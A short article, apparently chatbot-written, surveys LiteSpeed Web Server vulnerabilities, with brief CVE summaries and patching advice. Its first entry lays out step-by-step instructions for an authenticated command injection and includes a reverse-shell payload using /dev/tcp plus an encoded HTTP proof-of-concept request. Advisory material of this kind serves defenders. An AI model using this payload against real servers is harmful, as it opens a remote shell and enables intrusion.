Let’s delve into the topic of LiteSpeed Web Server (LSWS) exploits. While LSWS is known for its performance and security features, like any software, it can have vulnerabilities. Here are some notable instances:
- Command Injection (Authenticated):
- Vulnerability: In LSWS Enterprise version 5.4.11, an authenticated attacker could exploit a command injection vulnerability.
- Exploit Steps:
- Log in to the dashboard using the Administrator account.
- Access Server Configuration > Server > External App > Edit.
- Set “Start By Server *” Value to “Yes (Through CGI Daemon)”.
- Inject the payload
fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'into the “Command” value. - Perform a graceful restart.
- Proof of Concept (PoC):
POST /config/confMgr.php HTTP/1.1 Host: 192.168.1.6:7080 ... path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.1.6%2F1234+0%3E%261%27 ... - References: 12
- CVE-2022-0072, CVE-2022-0073, and CVE-2022-0074:
- Vulnerability: These vulnerabilities affect OpenLiteSpeed and LiteSpeed Enterprise WebAdmin Console.
- Exploit Scenario: After achieving WebAdmin Authentication, an attacker could create a secret backdoor and exploit the vulnerability to access it.
- Mitigation: Ensure timely updates and patches.
- Reference: 3
- Directory Traversal Vulnerability:
- Vulnerability: In certain versions of LSWS, a directory traversal vulnerability exists in the OpenLiteSpeed Web Server Dashboard.
- Impact: An attacker could exploit path traversal.
- Affected Versions: Versions from 1.5.11 through 1.5.12, 1.6.5 through 1.6.20.1, and 1.7.0 before 1.7.16.1.
- Reference: 4
Remember that staying informed about security updates and promptly applying patches is crucial to safeguarding your web server. LSWS remains a powerful choice, but vigilance is essential to mitigate risks.
